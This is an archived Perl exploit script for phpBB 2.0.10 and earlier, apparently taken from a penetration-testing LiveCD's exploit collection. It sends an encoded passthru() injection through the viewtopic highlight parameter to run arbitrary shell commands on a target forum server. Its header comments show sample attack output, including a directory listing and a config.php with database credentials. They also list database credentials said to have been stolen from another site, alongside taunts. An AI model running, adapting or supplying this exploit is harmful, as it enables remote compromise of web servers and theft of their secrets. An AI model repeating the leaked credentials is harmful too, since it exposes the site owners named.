home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / r57phpbb2010.pl < prev   
Perl Script  |  2005-02-12  |  6KB  |  143 lines
  1. #!/usr/bin/perl
  2.  
  3. use IO::Socket;
  4.  
  5. ##                     @@@@@@@   @@@  @@@   @@@@@@  @@@  @@@
  6. ##                     @@!  @@@  @@!  @@@  !@@      @@!  @@@
  7. ##                     @!@!!@!   @!@  !@!   !@@!!   @!@!@!@!
  8. ##                     !!: :!!   !!:  !!!      !:!  !!:  !!!
  9. ##                      :   : :   :.:: :   ::.: :    :   : :
  10. ##
  11. ## phpBB <= 2.0.10 remote commands exec exploit
  12. ## based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0
  13. ## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
  14. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  15. ## example...
  16. ## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
  17. ## The third issue, search highlighting, has been checked by us several times and we can do 
  18. ## nothing with it at all. Again, that particular group admit likewise. In a future release 
  19. ## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our 
  20. ## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to 
  21. ## be cause for an immediate release.
  22. ## heh...
  23. ##
  24. ## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
  25. ## *** CMD: [ ls -la ]
  26. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  27. ##   total 507
  28. ##   drwxr-xr-x   12 dhn      phpbb         896 Oct 13 18:23 .
  29. ##   drwxrwxr-x   19 root     phpbb        1112 Nov 12 15:08 ..
  30. ##   drwxr-xr-x    2 dhn      phpbb         152 Oct 13 18:23 CVS
  31. ##   drwxr-xr-x    3 dhn      phpbb         944 Jul 19 15:17 admin
  32. ##   drwxrwxrwx    5 dhn      phpbb         160 Aug 14 21:19 cache
  33. ##   -rw-r--r--    1 dhn      phpbb       44413 Mar 11  2004 catdb.php
  34. ##   -rw-r--r--    1 dhn      phpbb        5798 Jul 19 15:17 common.php
  35. ##   -rw-r--r--    1 root     root          264 Jul  2 08:05 config.php
  36. ##   drwxr-xr-x    3 dhn      phpbb         136 Jun 24 06:40 db
  37. ##   drwxr-xr-x    3 dhn      phpbb         320 Jul 19 15:17 docs
  38. ##   -rw-r--r--    1 dhn      phpbb         814 Oct 30  2003 extension.inc
  39. ##   -rw-r--r--    1 dhn      phpbb        3646 Jul 10 04:21 faq.php
  40. ##   drwxr-xr-x    2 dhn      phpbb          96 Aug 12 14:59 files
  41. ##   -rw-r--r--    1 dhn      phpbb       45642 Jul 12 12:42 groupcp.php
  42. ##   drwxr-xr-x    7 dhn      phpbb         240 Aug 12 16:22 images
  43. ##   drwxr-xr-x    3 dhn      phpbb        1048 Jul 19 15:17 includes
  44. ##   -rw-r--r--    1 dhn      phpbb       14518 Jul 10 04:21 index.php
  45. ##   drwxr-xr-x   60 dhn      phpbb        2008 Sep 27 01:54 language
  46. ##   -rw-r--r--    1 dhn      phpbb        7481 Jul 19 15:17 login.php
  47. ##   -rw-r--r--    1 dhn      phpbb       12321 Mar  4  2004 memberlist.php
  48. ##   -rw-r--r--    1 dhn      phpbb       37639 Jul 10 04:21 modcp.php
  49. ##   -rw-r--r--    1 dhn      phpbb       45945 Mar 24  2004 mods_manager.php
  50. ##   -rw-r--r--    1 dhn      phpbb       34447 Jul 10 04:21 posting.php
  51. ##   -rw-r--r--    1 dhn      phpbb       72580 Jul 10 04:21 privmsg.php
  52. ##   -rw-r--r--    1 dhn      phpbb        4190 Jul 12 12:42 profile.php
  53. ##   -rw-r--r--    1 dhn      phpbb       16276 Oct 13 18:23 rules.php
  54. ##   -rw-r--r--    1 dhn      phpbb       42694 Jul 19 15:17 search.php
  55. ##   drwxr-xr-x    4 dhn      phpbb         136 Jun 24 06:41 templates
  56. ##   -rw-r--r--    1 dhn      phpbb       23151 Mar 13  2004 viewforum.php
  57. ##   -rw-r--r--    1 dhn      phpbb        7237 Jul 10 04:21 viewonline.php
  58. ##   -rw-r--r--    1 dhn      phpbb       45151 Jul 10 04:21 viewtopic.php
  59. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  60. ## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
  61. ## *** CMD: [ cat config.php ]
  62. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  63. ##   $dbms = "mysql";
  64. ##   $dbhost = "localhost";
  65. ##   $dbname = "phpbb";
  66. ##   $dbuser = "phpbb";
  67. ##   $dbpasswd = "phpBB_R0cKs";
  68. ##   $table_prefix = "phpbb_";
  69. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  70. ## rocksss.... 
  71. ##
  72. ## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
  73. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  74. ## fucking lamaz...
  75. ##
  76. ## ccteam.ru
  77. ## $dbname   = "ccteam_phpbb2";
  78. ## $dbuser   = "ccteam_userphpbb";
  79. ## $dbpasswd = "XCbRsoy1";
  80. ##
  81. ## eat this dude...
  82. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  83.  
  84. if (@ARGV < 4)
  85.  {
  86.  print q(############################################################
  87.      phpBB <=2.0.10 remote command execution exploit
  88.         by RusH security team // www.rst.void.ru
  89. ############################################################
  90.  usage:
  91.  r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
  92.  params:
  93.   [URL] - server url e.g. www.phpbb.com
  94.   [DIR] - directory where phpBB installed e.g. /phpBB/ or /
  95.   [NUM] - number of existing topic
  96.   [CMD] - command for execute e.g. ls or "ls -la" 
  97. ############################################################
  98.  );   
  99.  exit;
  100.  }
  101.  
  102. $serv  = $ARGV[0];
  103. $dir   = $ARGV[1];
  104. $topic = $ARGV[2];
  105. $cmd   = $ARGV[3];
  106.  
  107. $serv =~ s/(http:\/\/)//eg;
  108. print "*** CMD: [ $cmd ]\r\n";
  109. print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
  110.  
  111. $cmd=~ s/(.*);$/$1/eg;
  112. $cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  113. $topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  114.  
  115. $path  = $dir;
  116. $path .= 'viewtopic.php?t=';
  117. $path .= $topic;
  118. $path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
  119. $path .= $cmd;
  120. $path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
  121. $path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
  122.  
  123. $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
  124.  
  125. print $socket "GET $path HTTP/1.1\n";
  126. print $socket "Host: $serv\n";
  127. print $socket "Accept: */*\n";
  128. print $socket "Connection: close\n\n";
  129.  
  130. $on = 0;
  131.  
  132. while ($answer = <$socket>)
  133. {
  134. if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
  135. if ($on == 1) { print "  $answer"; }
  136. if ($answer =~ /^_START_/) { $on = 1; }
  137. }
  138.  
  139. print "[-] EXPLOIT FAILED\r\n";
  140. print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
  141.  
  142. ### EOF ###
  143. ##//milw0rm.com